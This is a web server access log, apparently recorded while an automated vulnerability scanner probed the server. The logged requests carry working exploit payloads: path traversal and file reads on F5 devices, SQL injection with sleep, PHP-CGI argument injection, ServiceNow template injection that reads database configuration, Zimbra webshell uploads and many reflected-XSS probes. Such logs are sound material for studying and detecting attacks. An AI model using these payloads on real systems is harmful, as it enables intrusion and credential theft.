195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:22:54:54 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:22:55:04 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:22:55:05 +0000] POST /wsman HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:55:06 +0000] GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:55:07 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:55:08 +0000] POST /v1/backend1 HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:55:10 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:55:12 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:22:55:14 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:55:15 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:55:24 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:55:25 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:55:26 +0000] POST /fileupload/toolsAny HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:55:29 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:55:30 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:55:31 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:22:55:32 +0000] GET /menu/neo HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:55:32 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:55:33 +0000] GET /v1/2p2i90zNu7vHXFKEJxYkmUJse91.php HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:22:55:37 +0000] POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:55:37 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:55:37 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:55:38 +0000] POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:55:39 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:55:39 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:22:55:41 +0000] POST /aspera/faspex/package_relay/relay_package HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:55:43 +0000] POST /goanywhere/lic/accept HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:55:44 +0000] POST /index.php?c=blocked&action=continue HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:55:46 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:55:48 +0000] GET /2p2i91DJqmqcKAXCTSBuf5P6b4v.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:55:49 +0000] GET /authenticationendpoint/2p2i8ylpqjifyczm0bjzhjlyqhy.jsp HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:55:50 +0000] POST /api/2.0/mlflow/registered-models/create HTTP/1.1 404 1129
83.212.98.101 - - [18/Nov/2024:22:55:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:56:21 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:56:22 +0000] GET /menu/stc HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:56:23 +0000] GET /app?service=page/SetupCompleted HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:22:56:24 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:56:25 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:56:28 +0000] DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:56:29 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:56:29 +0000] GET /WebInterface HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:56:31 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2p2i8xT6hfPjgrataeyJD4aRca4 HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:56:33 +0000] POST /api/2.0/mlflow/model-versions/create HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:56:34 +0000] POST /webtools/control/xmlrpc?USERNAME&PASSWORD=2p2i8zy1HRK6DcLl3UdNsFk1YD1&requirePasswordChange=Y HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:56:39 +0000] GET /api/clusters HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:56:40 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:22:56:43 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:56:45 +0000] GET /xyz/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:22:57:08 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:57:10 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:22:57:11 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:57:12 +0000] POST /dana-na/auth/saml-sso.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:57:14 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:22:57:15 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:22:57:16 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:57:17 +0000] POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:57:19 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:57:20 +0000] GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:57:32 +0000] GET /en-US/login HTTP/1.1 404 1089
83.212.98.101 - - [18/Nov/2024:22:57:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:57:56 +0000] POST /Startup/Register HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:57:57 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:57:58 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:22:57:59 +0000] POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1097
- - - [18/Nov/2024:22:58:01 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:58:02 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:58:03 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:22:58:04 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:58:05 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:58:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:12 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:58:20 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:58:21 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:58:21 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:58:29 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:30 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:30 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:30 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:30 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:30 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
